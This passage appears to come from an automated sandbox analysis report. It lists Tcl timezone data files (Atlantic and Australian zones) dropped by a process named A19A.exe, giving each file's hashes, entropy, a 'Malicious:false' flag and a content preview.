                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.623004596418002
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:cQleDGC/2qdDW4saQCwjoDWFGKRJYHL/Tc7PjEWlyvKekkdoUOCOfNOaRqOjo/Kj:5r2cd5fmYEfAfYaRDjys/
                                                                                                                                                                                                                                                                                                                                MD5:0E3020348755C67F6A48F4C3F0F4E51D
                                                                                                                                                                                                                                                                                                                                SHA1:FBA44F3DEBC47274A1C9CC4AE5A5F9B363157BF1
                                                                                                                                                                                                                                                                                                                                SHA-256:83566E49A37703E11CF0884558BE3DD8827BD79409D04C5D053BCA69D666CEC8
                                                                                                                                                                                                                                                                                                                                SHA-512:97F78A8C98B03705188B6F4D622F3B88D7C85B2FF1578DA24C4CD85C163FB05DBD908413B5F355F001755705F22943B1DA6C2A58A902751787238110D2A81F95
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Reykjavik) {. {-9223372036854775808 -5280 0 LMT}. {-1956609120 -3600 0 -01}. {-1668211200 0 1 -01}. {-1647212400 -3600 0 -01}. {-1636675200 0 1 -01}. {-1613430000 -3600 0 -01}. {-1605139200 0 1 -01}. {-1581894000 -3600 0 -01}. {-1539561600 0 1 -01}. {-1531350000 -3600 0 -01}. {-968025600 0 1 -01}. {-952293600 -3600 0 -01}. {-942008400 0 1 -01}. {-920239200 -3600 0 -01}. {-909957600 0 1 -01}. {-888789600 -3600 0 -01}. {-877903200 0 1 -01}. {-857944800 -3600 0 -01}. {-846453600 0 1 -01}. {-826495200 -3600 0 -01}. {-815004000 0 1 -01}. {-795045600 -3600 0 -01}. {-783554400 0 1 -01}. {-762991200 -3600 0 -01}. {-752104800 0 1 -01}. {-731541600 -3600 0 -01}. {-717631200 0 1 -01}. {-700092000 -3600 0 -01}. {-686181600 0 1 -01}. {-668642400 -3600 0 -01}. {-654732000 0 1 -01}. {-636588000 -3600 0 -01}. {-623282400 0 1 -01}. {-605
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):154
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.967019958156088
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFx52RQqGtlN62/EUXGm2OHXT14YvXhFvdQVIK:SlSWB9X52RQrlo2Mbm2OHXqYPTFQV7
                                                                                                                                                                                                                                                                                                                                MD5:421C0110145FB8288B08133DD1409E75
                                                                                                                                                                                                                                                                                                                                SHA1:CD2D62E739FF1715268B6DFB2C523ED3C76B7A90
                                                                                                                                                                                                                                                                                                                                SHA-256:4B78F3E086B2A8B4366362AB5CEF2DF6A28E2B0EA8279C0FE9414E974BBC2E08
                                                                                                                                                                                                                                                                                                                                SHA-512:3B20413C6E15A846B3CC730EBCD77D8AA170ECC262E160BB996AA79173F30D42588352C38EA1B44539A62D77B2BC8418A3C4B7507997AF4F15FBD647BF567A88
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/South_Georgia) {. {-9223372036854775808 -8768 0 LMT}. {-2524512832 -7200 0 -02}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):184
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.831929124818878
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqss1kvFVAIgNGE4Rvt2RQqGt4r+DcsP:SlSWB9IZaM3y7sYFVAIgNT4tt2RQr4rC
                                                                                                                                                                                                                                                                                                                                MD5:8F4668F0D79577139B59A80D714E45A5
                                                                                                                                                                                                                                                                                                                                SHA1:BCD79EDCCB687A2E74794B8CFDE99A7FEC294811
                                                                                                                                                                                                                                                                                                                                SHA-256:C78C4E980A378B781ED6D2EA72ABAEF8FFED186538DEB18B61D94B575734FC6A
                                                                                                                                                                                                                                                                                                                                SHA-512:08D1472377229BC76A496259344263993791B4DF3F83D94F798779249A5CAE15F6B4341A665387780EA8B1278E9D5FFBCA1BCDE06B3E54750E32078FA482ABD6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Abidjan)]} {. LoadTimeZoneFile Africa/Abidjan.}.set TZData(:Atlantic/St_Helena) $TZData(:Africa/Abidjan).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2181
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.570822154620431
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:50wIS1SbSRxS5Sh/ScoOG2S+SZSgSsSs/SYS6SDSF3SLShS7KXS6SkSGSn/S+7SG:PIEg8CCcOFVOfjl/nxw6cmrXlXdgj7E6
                                                                                                                                                                                                                                                                                                                                MD5:747D86EC0B020967D989E3D6C4DD273F
                                                                                                                                                                                                                                                                                                                                SHA1:567F9E398FEDF58D68F73EB16CE33F8483B44ECE
                                                                                                                                                                                                                                                                                                                                SHA-256:F88641114EC11D4129EEFE59CCD587AAD9C1898C3AFEE8A7CB85962312637640
                                                                                                                                                                                                                                                                                                                                SHA-512:B7A97E1DCC9E52A0565B50C8865A955924AFED08C21BC1DCCF73A3327C98D0A98706C03913A4872BD24DD2167B2170A6134CA177B20305DEF23D72ADDD668FB0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Atlantic/Stanley) {. {-9223372036854775808 -13884 0 LMT}. {-2524507716 -13884 0 SMT}. {-1824235716 -14400 0 -04}. {-1018209600 -10800 1 -04}. {-1003093200 -14400 0 -04}. {-986760000 -10800 1 -04}. {-971643600 -14400 0 -04}. {-954705600 -10800 1 -04}. {-939589200 -14400 0 -04}. {-923256000 -10800 1 -04}. {-908139600 -14400 0 -04}. {-891806400 -10800 1 -04}. {-876690000 -14400 0 -04}. {-860356800 -10800 1 -04}. {420606000 -7200 0 -03}. {433303200 -7200 1 -03}. {452052000 -10800 0 -03}. {464151600 -7200 1 -03}. {483501600 -10800 0 -03}. {495597600 -14400 0 -04}. {495604800 -10800 1 -04}. {514350000 -14400 0 -04}. {527054400 -10800 1 -04}. {545799600 -14400 0 -04}. {558504000 -10800 1 -04}. {577249200 -14400 0 -04}. {589953600 -10800 1 -04}. {608698800 -14400 0 -04}. {621403200 -10800 1 -04}. {640753200 -14400 0 -04}. {652852800 -10800 1 -04}
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.813373101386862
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjpMFBx/h4QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCeMFB/4D2
                                                                                                                                                                                                                                                                                                                                MD5:F48AD4B81CD3034F6E5D3CA1B5A8BDD4
                                                                                                                                                                                                                                                                                                                                SHA1:676FE3F50E3E132C1FD185A1EE1D8C830763204F
                                                                                                                                                                                                                                                                                                                                SHA-256:553D7DA9A2EDBD933E8920573AE6BCBAA00302817939046CF257CAEACEC19FAD
                                                                                                                                                                                                                                                                                                                                SHA-512:36A4E2286FBEF2F4ED4B9CD1A71136E227FEF4B693F9F43649B790E859221EE470679A7E3C283770DA5CB0113A1C8C1F99480E7020328FFE3E9C870798B092F5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/ACT) $TZData(:Australia/Sydney).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8099
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.812665609163787
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:JPtFF+Wc4CNphbQbPzpRtYac1w6N5HxnLmPaod/gWFXht/c+u8dRYaaiqcdtXHVf:JP5+zNMdYacv5HhLmPajSXz5HV5x
                                                                                                                                                                                                                                                                                                                                MD5:4E73BDB571DBF2625E14E38B84C122B4
                                                                                                                                                                                                                                                                                                                                SHA1:B9D7B7D2855D102800B53FB304633F5BC961A8D0
                                                                                                                                                                                                                                                                                                                                SHA-256:9138DF8A3DE8BE4099C9C14917B5C5FD7EB14751ACCD66950E0FDB686555FFD6
                                                                                                                                                                                                                                                                                                                                SHA-512:CF9AB3E9A7C1A76BCC113828ABAF88FE83AAF5CAD7BD181201E06A0CF43E30BA8817AAA88AB3F0F14F459599D91F63ECE851F095154050263C5AD08B2275B4C7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Adelaide) {. {-9223372036854775808 33260 0 LMT}. {-2364110060 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}. {31501800 34200 0 ACST}. {57688200 37800 1 ACDT}. {67969800 34200 0 ACST}. {89137800 37800 1 ACDT}. {100024200 34200 0 ACST}. {120587400 37800 1 ACDT}. {131473800 34200 0 ACST}. {152037000 37800 1 ACDT}. {162923400 34200 0 ACST}. {183486600 37800 1 ACDT}. {194977800 34200 0 ACST}. {215541000 37800 1 ACDT}. {226427400 34200 0 ACST}. {246990600 37800 1 ACDT}. {257877000 34200 0 ACST}. {278440200 37800 1 ACDT}. {289326600 34200 0 ACST}. {309889800 37800 1 ACDT}. {320776200 34200 0 ACST}. {341339400 37800 1 ACDT}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):651
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.265580091557009
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52nmdHLOYPv+tCdd8xdsWz9ag5J4UVdKcWWC:cQne6skVk
                                                                                                                                                                                                                                                                                                                                MD5:296B4B78CEE05805E5EE53B4D5F7284F
                                                                                                                                                                                                                                                                                                                                SHA1:DDB5B448E99F278C633B2DBD5A816C4DE28DC726
                                                                                                                                                                                                                                                                                                                                SHA-256:2580C3EEEC029572A1FF629E393F64E326DEDAA96015641165813718A8891C4D
                                                                                                                                                                                                                                                                                                                                SHA-512:9DE71000BB8AC48A82D83399BD707B661B50882EEBFE2A7E58A81A2F6C04B1F711DAE3AA09A77A9EE265FB633B8883D2C01867AF96F8BE5137119E4FB447DF8C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Brisbane) {. {-9223372036854775808 36728 0 LMT}. {-2366791928 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {625593600 39600 1 AEDT}. {636480000 36000 0 AEST}. {657043200 39600 1 AEDT}. {667929600 36000 0 AEST}. {688492800 39600 1 AEDT}. {699379200 36000 0 AEST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8162
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.820479465698825
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:EkxtFF+Wc4Yphbhd1zCRtYac1w6N5HxnLmPaod/gWFXht/c+u8dRYaaiqcdtXHVf:Ekx5+X5sYacv5HhLmPajSXz5HV5x
                                                                                                                                                                                                                                                                                                                                MD5:B4AF947B4737537DF09A039D1E500FB8
                                                                                                                                                                                                                                                                                                                                SHA1:CCC0DC52D586BFAA7A0E70C80709231B4BB93C54
                                                                                                                                                                                                                                                                                                                                SHA-256:80BBD6D25D4E4EFA234EAD3CB4EB801DC576D1348B9A3E1B58F729FEB688196D
                                                                                                                                                                                                                                                                                                                                SHA-512:3B27C36FA3034CB371DD07C992B3A5B1357FC7A892C35910DA139C7DA560DDC0AA1E95966438776F75397E7219A7DA0AD4AD6FB922B5E0BE2828D3534488BFD0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Broken_Hill) {. {-9223372036854775808 33948 0 LMT}. {-2364110748 36000 0 AEST}. {-2314951200 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}. {31501800 34200 0 ACST}. {57688200 37800 1 ACDT}. {67969800 34200 0 ACST}. {89137800 37800 1 ACDT}. {100024200 34200 0 ACST}. {120587400 37800 1 ACDT}. {131473800 34200 0 ACST}. {152037000 37800 1 ACDT}. {162923400 34200 0 ACST}. {183486600 37800 1 ACDT}. {194977800 34200 0 ACST}. {215541000 37800 1 ACDT}. {226427400 34200 0 ACST}. {246990600 37800 1 ACDT}. {257877000 34200 0 ACST}. {278440200 37800 1 ACDT}. {289326600 34200 0 ACST}. {309889800 37800 1 ACDT}. {320776200 34200 0 ACS
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):190
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.80238049701662
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjnSV1+QWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DCcq+DCyu
                                                                                                                                                                                                                                                                                                                                MD5:16F9CFC4C5B9D5F9F9DB9346CECE4393
                                                                                                                                                                                                                                                                                                                                SHA1:ED1ED7BA73EB287D2C8807C4F8EF3EFA516F5A68
                                                                                                                                                                                                                                                                                                                                SHA-256:853A159B8503B9E8F42BBCE60496722D0A334FD79F30448BAD651F18BA388055
                                                                                                                                                                                                                                                                                                                                SHA-512:9572CCB1BC499BADA72B5FE533B56156DB9EB0DEDFD4AE4397AD60F2A8AF5991F7B1B06A1B8D14C73832543AF8C12F5B16A9A80D093BF0C7ED6E38FF8B66E197
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/Canberra) $TZData(:Australia/Sydney).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8097
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.7668602204696375
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:GJiG+HuKIyymp8tLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:GJqXytLhbVXdnPQler
                                                                                                                                                                                                                                                                                                                                MD5:7E0D1435E11C9AE84EF1A863D1D90C61
                                                                                                                                                                                                                                                                                                                                SHA1:CE76A3D902221F0EF9D8C25EB2D46A63D0D09D0B
                                                                                                                                                                                                                                                                                                                                SHA-256:3C0B35627729316A391C5A0BEE3A0E353A0BAEAD5E49CE7827E53D0F49FD6723
                                                                                                                                                                                                                                                                                                                                SHA-512:D262294AC611396633184147B0F6656290BF97A298D6F7EC025E1D88AAC5343363744FD1CB849CDE84F3C1B2CF860CFA7CA43453ADBF68B0903DA1361F0DCD69
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Currie) {. {-9223372036854775808 34528 0 LMT}. {-2345794528 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {47138400 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226425600 36000 0 AEST}. {246988800 39600 1 AEDT}. {257875200 36000 0 AEST}. {278438400 39600 1 AEDT}. {289324800 36000 0 AEST}. {309888000 39600 1 AEDT}. {320774400 36000 0 AEST}. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):422
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4678452003570435
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52umdHPPZUj/sVdFFtf/FFAXFFwFFgh:cQuenZq/sVd/tH/AX/w/C
                                                                                                                                                                                                                                                                                                                                MD5:FC9689FEF4223726207271E2EAAE6548
                                                                                                                                                                                                                                                                                                                                SHA1:26D0B4FC2AD943FCAC90F179F7DF6C18EE12EBB8
                                                                                                                                                                                                                                                                                                                                SHA-256:C556C796CCD3C63D9F694535287DC42BB63140C8ED39D31FDA0DA6E94D660A1C
                                                                                                                                                                                                                                                                                                                                SHA-512:7898C0DE77297FBAA6AAF9D15CB9765DAF63ED4761BA181D0D1A590A6F19A6B7F6E94564A80EB691ED2D89C96D68449BF57816E4093E5011B93D30C3E1624D60
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Darwin) {. {-9223372036854775808 31400 0 LMT}. {-2364108200 32400 0 ACST}. {-2230189200 34200 0 ACST}. {-1672565340 37800 1 ACDT}. {-1665390600 34200 0 ACST}. {-883639800 37800 1 ACDT}. {-876126600 34200 0 ACST}. {-860398200 37800 1 ACDT}. {-844677000 34200 0 ACST}. {-828343800 37800 1 ACDT}. {-813227400 34200 0 ACST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):734
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.049000512576295
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp527JmdHvOYPV2oV2NF2AUV2ikUF2XV2ouwF2aUF2giV2XHVKF2qV2sF2jV2oA:cQ7JemssNLdUpouw5o5X0mszo4Ui/MXu
                                                                                                                                                                                                                                                                                                                                MD5:F997E4624049132CEC09AC77FBA839E3
                                                                                                                                                                                                                                                                                                                                SHA1:7BD0097EF75621646CE1969A61596F7FA2E75188
                                                                                                                                                                                                                                                                                                                                SHA-256:C3E63F8BC7739A23C21DE71425EDDA7927C31D00BC9E23D3A265C93885248991
                                                                                                                                                                                                                                                                                                                                SHA-512:B50EDBBA11D1B8FC7DF13A9DBDE9314E1694E36F2CB810C0160406406161CC8FD52BDBFD13D10EEABE2859FA7AEBC35EBF9AB826EB92BBF26D92EEDD15633649
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Eucla) {. {-9223372036854775808 30928 0 LMT}. {-2337928528 31500 0 +0945}. {-1672562640 35100 1 +0945}. {-1665387900 31500 0 +0945}. {-883637100 35100 1 +0945}. {-876123900 31500 0 +0945}. {-860395500 35100 1 +0945}. {-844674300 31500 0 +0945}. {-836473500 35100 0 +0945}. {152039700 35100 1 +0945}. {162926100 31500 0 +0945}. {436295700 35100 1 +0945}. {447182100 31500 0 +0945}. {690311700 35100 1 +0945}. {699383700 31500 0 +0945}. {1165079700 35100 1 +0945}. {1174756500 31500 0 +0945}. {1193505300 35100 1 +0945}. {1206810900 31500 0 +0945}. {1224954900 35100 1 +0945}. {1238260500 31500 0 +0945}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8325
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.767204262183229
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:8xKiG+HuKIyymp8tLhbVXd33cZF7bLaE9DTtM/m7eeYWlQOZIeVUF:8xKqXytLhbVXdnPQler
                                                                                                                                                                                                                                                                                                                                MD5:67AF9A2B827308DD9F7ABEC9441C3250
                                                                                                                                                                                                                                                                                                                                SHA1:CD87DD4181B41E66EFEA9C7311D5B7191F41EA3A
                                                                                                                                                                                                                                                                                                                                SHA-256:814BD785B5ACDE9D2F4FC6E592E919BA0FE1C3499AFC1071B7FA02608B6032AB
                                                                                                                                                                                                                                                                                                                                SHA-512:BC6B8CE215B3B4AC358EB989FB1BB5C6AD61B39B7BBD36AAA924A2352E823C029131E79DA927FEEBDD5CF759FDE527F39089C93B0826995D37052362BEAE09F6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Hobart) {. {-9223372036854775808 35356 0 LMT}. {-2345795356 36000 0 AEST}. {-1680508800 39600 1 AEDT}. {-1669892400 39600 0 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {-94730400 36000 0 AEST}. {-71136000 39600 1 AEDT}. {-55411200 36000 0 AEST}. {-37267200 39600 1 AEDT}. {-25776000 36000 0 AEST}. {-5817600 39600 1 AEDT}. {5673600 36000 0 AEST}. {25632000 39600 1 AEDT}. {37728000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {89136000 39600 1 AEDT}. {100022400 36000 0 AEST}. {120585600 39600 1 AEDT}. {131472000 36000 0 AEST}. {152035200 39600 1 AEDT}. {162921600 36000 0 AEST}. {183484800 39600 1 AEDT}. {194976000 36000 0 AEST}. {215539200 39600 1 AEDT}. {226
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):194
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.865814837459796
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:SlSWB9IZaM3yIoGEowFVAIgjG/L2DCkx/2DCPGT:MBaIMje0QL2a7
                                                                                                                                                                                                                                                                                                                                MD5:1221FC8932CA3DCA431304AF660840F0
                                                                                                                                                                                                                                                                                                                                SHA1:5E023E37D98EA1321B10D36A79B26DF1A017F9D5
                                                                                                                                                                                                                                                                                                                                SHA-256:EB8FDBCFDE9E2A2AA829E784D402966F61A5BF6F2034E0CB06A24FACB5B87874
                                                                                                                                                                                                                                                                                                                                SHA-512:EB19FE74DC13456D0F9F1EDC9C444793A4011D3B65ADF6C7E7A405504079EB3A0C27F69DDA662F797FE363948E93833422F5DC3C1891AA7D414B062BE4DD3887
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Lord_Howe)]} {. LoadTimeZoneFile Australia/Lord_Howe.}.set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe).
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):796
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1890768067004
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:MBp52gCmdHVP/+tCdd8xdsWz9ag5J4UVdKcWW3ty/yJATUJrRxC:cQgCeRUVfl7w
                                                                                                                                                                                                                                                                                                                                MD5:08E88B2169BC76172E40515F9DA2C147
                                                                                                                                                                                                                                                                                                                                SHA1:5C03B7C9748E63C2B437C97F8ED923A9F3E374E7
                                                                                                                                                                                                                                                                                                                                SHA-256:9E3558C8514E97274D9F938E9841C5E3355E738BBD55BCB17FA27FF0E0276AEA
                                                                                                                                                                                                                                                                                                                                SHA-512:39E10639C97DE82428818B9C5D059BA853A17113351BAEE2512806AC3066EDDF0294859519AFBE425E0D1315B1A090F84C08CEFEDCE2A3D3A38EEF782234D8C4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lindeman) {. {-9223372036854775808 35756 0 LMT}. {-2366790956 36000 0 AEST}. {-1672567140 39600 1 AEDT}. {-1665392400 36000 0 AEST}. {-883641600 39600 1 AEDT}. {-876128400 36000 0 AEST}. {-860400000 39600 1 AEDT}. {-844678800 36000 0 AEST}. {-828345600 39600 1 AEDT}. {-813229200 36000 0 AEST}. {31500000 36000 0 AEST}. {57686400 39600 1 AEDT}. {67968000 36000 0 AEST}. {625593600 39600 1 AEDT}. {636480000 36000 0 AEST}. {657043200 39600 1 AEDT}. {667929600 36000 0 AEST}. {688492800 39600 1 AEDT}. {699379200 36000 0 AEST}. {709912800 36000 0 AEST}. {719942400 39600 1 AEDT}. {731433600 36000 0 AEST}. {751996800 39600 1 AEDT}. {762883200 36000 0 AEST}.}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7519
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.4688530726187112
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:zVjDVP0Izj1cdhsARcuhb4F3LbSZYt2U/gTpxxM3a6Z/nEgAmQso4QgDD:zv3qrcuhb4FbbCegi
                                                                                                                                                                                                                                                                                                                                MD5:169FF1BE6B6407E853AAF9F6E9A9A047
